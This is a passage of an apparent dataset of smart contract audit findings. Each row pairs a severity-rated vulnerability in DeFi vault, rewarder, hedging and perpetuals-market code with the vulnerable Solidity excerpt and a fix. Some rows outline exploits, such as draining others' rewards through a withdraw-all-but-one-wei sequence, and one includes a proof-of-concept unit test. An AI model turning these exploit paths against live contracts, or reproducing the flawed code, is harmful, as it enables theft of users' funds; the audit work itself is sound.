ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n" +Wrong accounting of user's holdings allows theft of reward,high,"In `deposit()`, `withdraw()` and `withdrawProfit()`, `rewarder.onReward()` is called for reward bookkeeping. It will transfer previous eligible rewards and update the current amount user has:\\n```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n\\nIn `withdraw()`, there is a critical issue where `onReward()` is called too early:\\n```\\n // Update rewarder for this user\\n if (address(rewarder) != address(0)) {\\n rewarder.onReward(0, msg.sender, msg.sender, pending, user.amount);\\n }\\n // Burn baby burn\\n _burn(msg.sender, _shares);\\n // User accounting\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nThe new _amt which will be stored in reward contract's user.amount is vault's user.amount, before decrementing the withdrawn amount. Therefore, the withdrawn amount is still gaining rewards even though it's no longer in the contract. Effectively it is stealing the rewards of others, leading to reward insolvency. In order to exploit this flaw, attacker will deposit a larger amount and immediately withdraw it, except for one wei. When they would like to receive the rewards accrued for others, they will withdraw the remaining wei, which will trigger `onReward()`, which will calculate and send pending awards for the previously withdrawn amount.",Move the `onReward()` call to after user.amount is updated.,,```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n +Unsafe transferFrom breaks compatibility with 100s of ERC20 tokens,medium,"In Ninja vaults, the delegated strategy sends profit tokens to the vault using `depositProfitTokenForUsers()`. The vault transfers the tokens in using:\\n```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n\\nThe issue is that the code doesn't use the `safeTransferFrom()` utility from SafeERC20. Therefore, profitTokens that don't return a bool in `transferFrom()` will cause a revert which means they are stuck in the strategy. Examples of such tokens are USDT, BNB, among hundreds of other tokens.",Use `safeTransferFrom()` from SafeERC20.sol,,"```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n" +Attacker can force partial withdrawals to fail,medium,"In Ninja vaults, users call `withdraw()` to take back their deposited tokens. There is bookkeeping on remaining amount:\\n```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nIf the withdraw is partial (some tokens are left), user.amount is decremented by r.\\n```\\n uint256 r = (balance() * _shares) / totalSupply();\\n```\\n\\nAbove, r is calculated as the relative share of the user's _shares of the total balance kept in the vault.\\nWe can see that user.amount is incremented in deposit().\\n```\\n function deposit(uint256 _amount) public nonReentrant {\\n …\\n user.amount += _amount;\\n …\\n }\\n```\\n\\nThe issue is that the calculated r can be more than _amount , causing an overflow in `withdraw()` and freezing the withdrawal. All attacker needs to do is send a tiny amount of underlying token directly to the contract, to make the shares go out of sync.","Redesign user structure, taking into account that balance of underlying can be externally manipulated",,```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n +Rewards may be stuck due to unchangeable slippage parameter,medium,"In NyPtvFantomWftmBooSpookyV2StrategyToUsdc.sol, MAX_SLIPPAGE is used to limit slippage in trades of BOO tokens to USDC, for yield:\\n```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n\\nIf slippage is not satisfied the entire transaction reverts. Since MAX_SLIPPAGE is constant, it is possible that harvesting of the strategy will be stuck, due to operations leading to too high of a slippage. For example, strategy might accumulate a large amount of BOO, or `harvest()` can be sandwich-attacked.",Allow admin to set slippage after some timelock period.,,"```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n" +potential overflow in reward accumulator may freeze functionality,medium,"Note the above description of `updatePool()` functionality. We can see that accRewardPerShare is only allocated 128 bits in PoolInfo:\\n```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n\\nTherefore, even if truncation issues do not occur, it is likely that continuous incrementation of the counter would cause accRewardPerShare to overflow, which would freeze vault functionalities such as withdrawal.","Steal 32 bits from lastRewardTime and 32 bits from allocPoint to make the accumulator have 192 bits, which should be enough for safe calculations.",,```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n +"when using fee-on-transfer tokens in VaultV3, capacity is limited below underlyingCap",low,"Vault V3 documentation states it accounts properly for fee-on-transfer tokens. It calculates actual transferred amount as below:\\n```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n\\nA small issue is that underlyingCap is compared to the _amount before correction for actual transferred amount. Therefore, it cannot actually be reached, and limits the maximum capacity of the vault to underlyingCap minus a factor of the fee %.",Move the underlyingCap check to below the effective _amount calculation,,"```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n" +Redundant checks in Vault V3,low,"`depositProfitTokenForUsers()` and `withdrawProfit()` contain the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nHowever, lastProfitTime is only ever set to block.timestamp. Therefore, it can never be larger than block.timestamp.",It would be best in terms of gas costs and logical clarity to change the comparison to !=,,```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n +createUniswapRangeOrder() charges manager instead of pool,high,"_createUniswapRangeOrder() can be called either from manager flow, with createUniswapRangeOrder(), or pool-induced from hedgeDelta(). The issue is that the function assumes the sender is the parentLiquidityPool, for example:\\n```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n\\nBalance check is done on pool, but money is transferred from sender. It will cause the order to use manager's funds.\\n```\\n function createUniswapRangeOrder(\\n RangeOrderParams calldata params,\\n uint256 amountDesired\\n ) external {\\n require(!_inActivePosition(), ""RangeOrder: active position"");\\n _onlyManager();\\n bool inversed = collateralAsset == address(token0);\\n _createUniswapRangeOrder(params, amountDesired, inversed);\\n }\\n```\\n",Ensure safeTransfer from uses parentLiquidityPool as source.,,"```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n" +"hedgeDelta() priceToUse is calculated wrong, which causes bad hedges",high,"When _delta parameter is negative for `hedgeDelta()`, priceToUse will be the minimum between quotePrice and underlyingPrice.\\n```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n\\nThis works fine when direction is BELOW, because the calculated lowerTick and upperTick from _getTicksAndMeanPriceFromWei are guaranteed to be lower than current price.\\n```\\n int24 lowerTick = direction == RangeOrderDirection.ABOVE ? \\n nearestTick + tickSpacing : nearestTick - (2 * tickSpacing);\\n int24 tickUpper = direction ==RangeOrderDirection.ABOVE ? lowerTick + \\n tickSpacing : nearestTick - tickSpacing;\\n```\\n\\nTherefore, the fulfill condition is not true and we mint from the correct base. However, when direction is ABOVE, it is possible that the oracle supplied price (underlyingPrice) is low enough in comparison to pool price, that the fulfill condition is already active. In that case, the contract tries to mint from the wrong asset which will cause the wrong tokens to be sent in. In effect, the contract is not hedging. A similar situation occurs when _delta parameter is greater than zero.",Verify the calculated priceToUse is on the same side as pool-calculated tick price.,,"```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n" +multiplication overflow in getPoolPrice() likely,medium,"`getPoolPrice()` is used in hedgeDelta to get the price directly from Uniswap v3 pool:\\n```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n\\nThe issue is that calculation of p is likely to overflow. sqrtPriceX96 has 96 bits for decimals, 10** `token0.decimals()` will have 60 bits when decimals is 18, therefore there is only (256 - 2 * 96 - 60) / 2 = 2 bits for non-decimal part of sqrtPriceX96.",Consider converting the sqrtPrice to a 60x18 format and performing arithmetic operations using the PRBMathUD60x18 library.,,"```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n" +Hedging won't work if token1.decimals() < token0.decimals(),medium,"`tickToToken0PriceInverted()` performs some arithmetic calculations. It's called by `_getTicksAndMeanPriceFromWei()`, which is called by `hedgeDelta()`. This line can overflow:\\n```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n\\nAlso, this line would revert even if the above calculation was done correctly:\\n```\\n meanPrice = OptionsCompute.convertFromDecimals(meanPrice, \\n token0.decimals(), token1.decimals());\\n```\\n\\n```\\n function convertFromDecimals(uint256 value, uint8 decimalsA, uint8 decimalsB) internal pure\\n returns (uint256) {\\n if (decimalsA > decimalsB) {\\n revert();\\n }\\n …\\n```\\n\\nThe impact is that when `token1.decimals()` < `token0.decimals()`, the contract's main function is unusable.","Refactor the calculation to support different decimals combinations. Additionally, add more comprehensive tests to detect similar issues in the future.",,```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n +Overflow danger in _sqrtPriceX96ToUint,medium,"_sqrtPriceX96ToUint will only work when the non-fractional component of sqrtPriceX96 takes up to 32 bits. This represents a price ratio of 18446744073709551616. With different token digits it is not unlikely that this ratio will be crossed which will make hedgeDelta() revert.\\n```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\n",Perform the multiplication after converting the numbers to 60x18 variables,,"```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\n" +Insufficient dust checks,low,"In `hedgeDelta()`, there is a dust check in the case of sell wETH order:\\n```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n\\nHowever, the actual used amount is _delta\\n```\\n uint256 deltaToUse = _delta > int256(wethBalance) ? wethBalance : \\n uint256(_delta);\\n _createUniswapRangeOrder(rangeOrder, deltaToUse, inversed);\\n```\\n\\nThe check should be applied on deltaToUse rather than wethBalance because it will be the minimum of wethBalance and _delta. Additionally, there is no corresponding check for minting with collateral in case _delta is negative.",Correct current dust checks and add them also in the if clause.,,```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n +Linear vesting users may not receive vested amount,high,"TokenTransmuter supports two types of transmutations, linear and instant. In linear, allocated amount is released across time until fully vested, while in instant the entire amount is released immediately. transmuteLinear() checks that there is enough output tokens left in the contract before accepting transfer of input tokens.\\n```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n ""INSUFFICIENT_OUTPUT_TOKEN"");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n\\nHowever, `transmuteInstant()` lacks any remaining balance checks, and will operate as long as the function has enough output tokens to satisfy the request.\\n```\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n SafeERC20.safeTransfer(IERC20(outputTokenAddress), msg.sender, \\n allocation);\\n emit OutputTokenInstantReleased(msg.sender, allocation, \\n outputTokenAddress);\\n```\\n\\nAs a result, it is not ensured that tokens that have been reserved for linear distribution will be available when users request to claim them. An attacker may empty the output balance with a large instant transmute and steal future vested tokens of users.","In transmuteInstant, add a check similar to the one in transmuteLinear. It will ensure allocations are kept faithfully.",,"```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n ""INSUFFICIENT_OUTPUT_TOKEN"");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n" +Multiplier implementation causes limited functionality,low,"linearMultiplier and instantMultiplier are used to calculate output token amount from input token amount in transmute functions.\\n```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n\\nThe issue is that they are uint256 variables and can only multiply _inputTokenAmount, not divide it. It results in limited functionality of the protocol as vesting pairs where output tokens are valued more than input tokens cannot be used.",Add a boolean state variable which will describe whether to multiply or divide by the multiplier.,,```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n +Empty orders do not request from oracle and during settlement they use an invalid oracle version with `price=0` which messes up a lot of fees and funding accounting leading to loss of funds for the makers,high,"When `market.update` which doesn't change user's position is called, a new (current) global order is created, but the oracle version is not requested due to empty order. This means that during the order settlement, it will use non-existant invalid oracle version with `price = 0`. This price is then used to accumulate all the data in this invalid `Version`, meaning accounting is done using `price = 0`, which is totally incorrect. For instance, all funding and fees calculations multiply by oracle version's price, thus all time periods between empty order and the next valid oracle version will not accumulate any fees, which is funds usually lost by makers (as makers won't receive fees/funding for the risk they take).\\nWhen `market.update` is called, it requests a new oracle version at the current order's timestamp unless the order is empty:\\n```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n\\nThe order is empty when it doesn't modify user position:\\n```\\nfunction isEmpty(Order memory self) internal pure returns (bool) {\\n return pos(self).isZero() && neg(self).isZero();\\n}\\n\\nfunction pos(Order memory self) internal pure returns (UFixed6) {\\n return self.makerPos.add(self.longPos).add(self.shortPos);\\n}\\n\\nfunction neg(Order memory self) internal pure returns (UFixed6) {\\n return self.makerNeg.add(self.longNeg).add(self.shortNeg);\\n}\\n```\\n\\nLater, when a valid oracle version is commited, during the settlement process, oracle version at the position is used:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n // @audit no oracle version at this timestamp, thus it's invalid with `price=0`\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp); \\n\\n context.pending.global.sub(newOrder);\\n // @audit order is invalidated (it's already empty anyway), but the `price=0` is still used everywhere\\n if (!oracleVersion.valid) newOrder.invalidate();\\n\\n VersionAccumulationResult memory accumulationResult;\\n (settlementContext.latestVersion, context.global, accumulationResult) = VersionLib.accumulate(\\n settlementContext.latestVersion,\\n context.global,\\n context.latestPosition.global,\\n newOrder,\\n settlementContext.orderOracleVersion,\\n oracleVersion, // @audit <<< when oracleVersion is invalid, the `price=0` will still be used here\\n context.marketParameter,\\n context.riskParameter\\n );\\n// rest of code\\n```\\n\\nIf the oracle version is invalid, the order is invalidated, but the `price=0` is still used to accumulate. It doesn't affect pnl from price move, because the final oracle version is always valid, thus the correct price is used to evaluate all possible account actions, however it does affect accumulated fees and funding:\\n```\\nfunction _accumulateLinearFee(\\n Version memory next,\\n AccumulationContext memory context,\\n VersionAccumulationResult memory result\\n) private pure {\\n (UFixed6 makerLinearFee, UFixed6 makerSubtractiveFee) = _accumulateSubtractiveFee(\\n context.riskParameter.makerFee.linear(\\n Fixed6Lib.from(context.order.makerTotal()),\\n context.toOracleVersion.price.abs() // @audit <<< price == 0 for invalid oracle version\\n ),\\n context.order.makerTotal(),\\n context.order.makerReferral,\\n next.makerLinearFee\\n );\\n// rest of code\\n // Compute long-short funding rate\\n Fixed6 funding = context.global.pAccumulator.accumulate(\\n context.riskParameter.pController,\\n toSkew.unsafeDiv(Fixed6Lib.from(context.riskParameter.takerFee.scale)).min(Fixed6Lib.ONE).max(Fixed6Lib.NEG_ONE),\\n context.fromOracleVersion.timestamp,\\n context.toOracleVersion.timestamp,\\n context.fromPosition.takerSocialized().mul(context.fromOracleVersion.price.abs()) // @audit <<< price == 0 for invalid oracle version\\n );\\n// rest of code\\nfunction _accumulateInterest(\\n Version memory next,\\n AccumulationContext memory context\\n) private pure returns (Fixed6 interestMaker, Fixed6 interestLong, Fixed6 interestShort, UFixed6 interestFee) {\\n // @audit price = 0 and notional = 0 for invalid oracle version\\n UFixed6 notional = context.fromPosition.long.add(context.fromPosition.short).min(context.fromPosition.maker).mul(context.fromOracleVersion.price.abs());\\n// rest of code\\n```\\n\\nAs can be seen, all funding and fees accumulations multiply by oracle version's price (which is 0), thus during these time intervals fees and funding are 0.\\nThis will happen by itself during any period when there are no orders, because oracle provider's settlement callback uses `market.update` with empty order to settle user account, thus any non-empty order is always followed by an empty order for the next version and `price = 0` will be used to settle it until the next non-empty order:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('no fees accumulation due to invalid version with price = 0', async () => {\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\nfunction setupOracleAt(price: string, valid : boolean, timestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: valid,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n}\\n\\nconst riskParameter = { // rest of code(await market.riskParameter()) }\\nconst riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\nriskParameterMakerFee.linearFee = parse6decimal('0.005')\\nriskParameterMakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.makerFee = riskParameterMakerFee\\nconst riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\nriskParameterTakerFee.linearFee = parse6decimal('0.005')\\nriskParameterTakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.takerFee = riskParameterTakerFee\\nawait market.connect(owner).updateRiskParameter(riskParameter)\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nsetupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\nawait market\\n .connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\nsetupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is commited at timestamp+200\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is not commited at timestamp+300\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 400);\\nsetupOracleAt('0', false, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// settle to see makerValue at all versions\\nsetupOracle('100', TIMESTAMP + 400, TIMESTAMP + 500);\\n\\nawait market.settle(user.address);\\nawait market.settle(userB.address);\\n\\nvar ver = await market.versions(TIMESTAMP + 200);\\nconsole.log(""version 200: longValue: "" + ver.longValue + "" makerValue: "" + ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 300);\\nconsole.log(""version 300: longValue: "" + ver.longValue + "" makerValue: "" + ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 400);\\nconsole.log(""version 400: longValue: "" + ver.longValue + "" makerValue: "" + ver.makerValue);\\n})\\n```\\n\\nConsole log:\\n```\\nversion 200: longValue: -318 makerValue: 285\\nversion 300: longValue: -100000637 makerValue: 100500571\\nversion 400: longValue: -637 makerValue: 571\\n```\\n\\nNotice, that fees are accumulated between versions 200 and 300, version 300 has huge pnl (because it's evaluated at price = 0), which then returns to normal at version 400, but no fees are accumulated between version 300 and 400 due to version 300 having `price = 0`.",Keep the price from the previous valid oracle version and use it instead of oracle version's one if oracle version's price == 0.,"All fees and funding are incorrectly calculated as 0 during any period when there are no non-empty orders (which will be substantially more than 50% of the time, more like 90% of the time). Since most fees and funding are received by makers as a compensation for their price risk, this means makers will lose all these under-calculated fees and will receive a lot less fees and funding than expected.","```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n" +Vault global shares and assets change will mismatch local shares and assets change during settlement due to incorrect `_withoutSettlementFeeGlobal` formula,high,"Every vault update, which involves change of position in the underlying markets, `settlementFee` is charged by the Market. Since many users can deposit and redeem during the same oracle version, this `settlementFee` is shared equally between all users of the same oracle version. However, there is an issue in that `settlementFee` is charged once both for deposits and redeems, however `_withoutSettlementFeeGlobal` subtracts `settlementFee` in full both for deposits and redeems, meaning that for global fee, it's basically subtracted twice (once for deposits, and another time for redeems). But for local fee, it's subtracted proportional to `checkpoint.orders`, with sum of fee subtracted equal to exactly `settlementFee` (once). This difference in global and local `settlementFee` calculations leads to inflated `shares` and `assets` added for user deposits (local state) compared to vault overall (global state).\\nHere is an easy scenario to demonstrate the issue:\\nSettlementFee = `$10`\\nUser1 deposits `$10` for oracle version `t = 100`\\nUser2 redeems `10 shares` (worth $10) for the same oracle version `t = 100` (checkpoint.orders = 2)\\nOnce the oracle version `t = 100` settles, we have the following: 4.1. Global deposits = `$10`, redeems = `$10` 4.2. Global deposits convert to `0 shares` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.3. Global redeems convert to `0 assets` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.4. User1 deposit of `$10` converts to `5 shares` (because `_withoutSettlementFeeLocal(10)` applies `settlementFee` of `$5` (because there are 2 orders), returning 10-5=5) 4.5. User2 redeem of `10 shares` converts to `$5` (for the same reason)\\nFrom the example above it can be seen that:\\nUser1 receives 5 shares, but global vault shares didn't increase. Over time this difference will keep growing potentially leading to a situation where many user redeems will lead to 0 global shares, but many users will still have local shares which they will be unable to redeem due to underflow, thus losing funds.\\nUser2's assets which he can claim increase by $5, but global claimable assets didn't change, meaning User2 will be unable to claim assets due to underflow when trying to decrease global assets, leading to loss of funds for User2.\\nThe underflow in both cases will happen in `Vault._update` when trying to update global account:\\n```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\n",Calculate total orders to deposit and total orders to redeem (in addition to total orders overall). Then `settlementFee` should be multiplied by `deposit/orders` for `toGlobalShares` and by `redeems/orders` for `toGlobalAssets`. This weightening of `settlementFee` will make it in-line with local order weights.,"Any time there are both deposits and redeems in the same oracle version, the users receive more (local) shares and assets than overall vault shares and assets increase (global). This mismatch causes:\\nSystematic increase of (sum of user shares - global shares), which can lead to bank run since the last users who try to redeem will be unable to do so due to underflow.\\nSystematic increase of (sum of user assets - global assets), which will lead to users being unable to claim their redeemed assets due to underflow.\\nThe total difference in local and global `shares+assets` equals to `settlementFee` per each oracle version with both deposits and redeems. This can add up to significant amounts (at `settlementFee` = $1 this can be $100-$1000 per day), meaning it will quickly become visible especially for point 2., because typically global claimable assets are at or near 0 most of the time, since users usually redeem and then immediately claim, thus any difference of global and local assets will quickly lead to users being unable to claim.","```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\n" +"Requested oracle versions, which have expired, must return this oracle version as invalid, but they return it as a normal version with previous version's price instead",high,"Each market action requests a new oracle version which must be commited by the keepers. However, if keepers are unable to commit requested version's price (for example, no price is available at the time interval, network or keepers are down), then after a certain timeout this oracle version will be commited as invalid, using the previous valid version's price.\\nThe issue is that when this expired oracle version is used by the market (using oracle.at), the version returned will be valid (valid = true), because oracle returns version as invalid only if `price = 0`, but the `commit` function sets the previous version's price for these, thus it's not 0.\\nThis leads to market using invalid versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.\\nWhen requested oracle version is commited, but is expired (commited after a certain timeout), the price of the previous valid version is set to this expired oracle version:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = 